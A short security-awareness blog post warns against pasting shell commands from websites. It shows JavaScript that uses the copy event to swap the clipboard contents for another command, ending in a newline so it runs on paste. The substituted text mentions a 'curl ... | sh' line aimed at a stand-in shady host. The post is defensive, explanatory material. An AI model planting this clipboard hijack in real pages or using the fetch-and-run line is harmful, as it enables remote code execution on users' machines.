Don't Copy Paste into terminal

Other Oct 24, 2020

When you see a shell command on the Internet, do not copy it into your terminal.

Modern JavaScript Clipboard APIs allow a website to overwrite what is added to the clipboard.

Here is an example of how simple this attack can be.

$ echo "looks safe to me!"

Note that you don't even have to press ENTER in your terminal after pasting for the exploit to happen. The payload conveniently contains a trailing newline that does that for you!

Here is the JavaScript that is performing the exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    e.preventDefault();
});

Sources:
https://briantracy.xyz/writing/copy-paste-shell.html

Cover Image Credit: https://www.pexels.com/@soumil-kumar-4325

Tags